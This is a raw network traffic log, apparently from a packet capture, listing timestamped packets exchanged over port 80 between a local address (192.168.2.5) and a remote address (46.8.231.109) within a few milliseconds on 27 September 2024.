Sep 27, 2024 00:15:07.067616940 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.067616940 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068197966 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068223953 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068248034 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068249941 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068272114 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068294048 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068294048 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068296909 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068310976 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068342924 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068351030 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068373919 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068389893 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068397045 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068420887 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068435907 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068435907 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068443060 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068466902 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068480015 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068480015 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068490982 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068514109 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068520069 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068520069 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068541050 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068564892 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068583012 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068583012 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068588018 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068608046 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068612099 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068634987 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068635941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068660975 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068682909 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068682909 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068684101 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068706989 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068711042 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068730116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068733931 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068754911 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068759918 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068773985 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068778038 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068803072 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068816900 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068816900 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068825960 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068849087 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068872929 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068876028 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068876028 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068890095 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068897963 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.068937063 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.068937063 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069026947 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069052935 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069077015 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069082975 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069093943 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069099903 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069123030 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069143057 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069143057 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069160938 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069188118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069192886 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069200039 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069226027 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069248915 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069251060 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069271088 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069274902 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069292068 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069299936 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069323063 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069330931 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069344997 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069348097 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069363117 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069371939 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069394112 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069396019 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069418907 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069436073 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069436073 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069442987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069467068 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069480896 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069480896 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069492102 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069514990 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069515944 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069534063 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069540024 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069565058 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069577932 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069577932 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069587946 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069612026 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069626093 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069626093 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069636106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069677114 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069686890 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069686890 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069700956 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069725037 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069749117 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069751024 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069751024 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069766045 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069773912 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069794893 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069797039 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069822073 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069824934 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069837093 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069844961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069868088 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069883108 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069883108 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069890976 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069912910 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069915056 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069940090 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069958925 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069958925 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.069962978 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.069987059 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070003986 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070003986 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070010900 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070034981 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070055962 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070055962 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070060015 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070085049 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070096016 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070096016 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070123911 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070147038 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070149899 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070163965 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070172071 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070194960 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070216894 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070218086 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070230961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070257902 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070267916 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070291996 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070314884 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070314884 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070319891 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070329905 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070343971 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070363045 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070365906 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070389986 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070394993 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070410013 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070410967 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070434093 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070451021 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070451021 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070458889 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070482016 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070482969 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070507050 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070529938 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070530891 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070544004 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070554018 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070573092 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070576906 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070600986 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070604086 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070624113 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070626020 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070647955 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070667982 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070667982 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070671082 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070688009 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070694923 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070718050 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070729017 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070743084 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070760012 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070760012 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070766926 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070784092 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070791006 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070811987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070815086 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070835114 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070837975 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070861101 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070873976 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070873976 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070884943 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070904016 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070908070 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070930004 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070933104 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070955992 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.070975065 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070975065 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.070976973 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071000099 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071010113 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071011066 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071024895 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071049929 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071074009 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071077108 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071078062 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071099997 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071121931 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071125031 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071140051 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071154118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071160078 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071177959 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071181059 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071198940 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071221113 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071221113 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071223974 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071248055 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071264029 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071264029 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071271896 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071299076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071321964 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071326017 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071326017 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071346045 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071346998 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071362019 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071374893 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071405888 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071410894 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071424007 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071433067 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071456909 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071459055 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071482897 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071501017 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071501017 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071506023 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071531057 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071549892 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071549892 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071552992 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071578026 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071594954 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071594954 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071602106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071624994 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071643114 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071643114 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071650982 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071670055 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071675062 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071698904 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071700096 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071722984 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071746111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071753979 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071753979 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071770906 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071789980 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071789980 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071794033 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071813107 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071819067 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071841955 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071865082 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071868896 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071868896 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071881056 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071890116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071921110 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071921110 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.071927071 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071974993 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.071994066 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072000027 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072022915 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072036028 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072036028 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072047949 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072074890 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072091103 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072091103 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072098970 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072122097 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072140932 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072140932 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072145939 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072170973 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072186947 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072186947 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072194099 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072221994 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072222948 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072235107 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072247028 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072268963 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072277069 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072293997 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072309971 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072309971 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072316885 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072341919 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072365999 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072370052 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072370052 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072391033 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072406054 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072406054 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072415113 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072438002 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072448015 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072448015 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072462082 CEST	80	49708	46.8.231.109	192.168.2.5
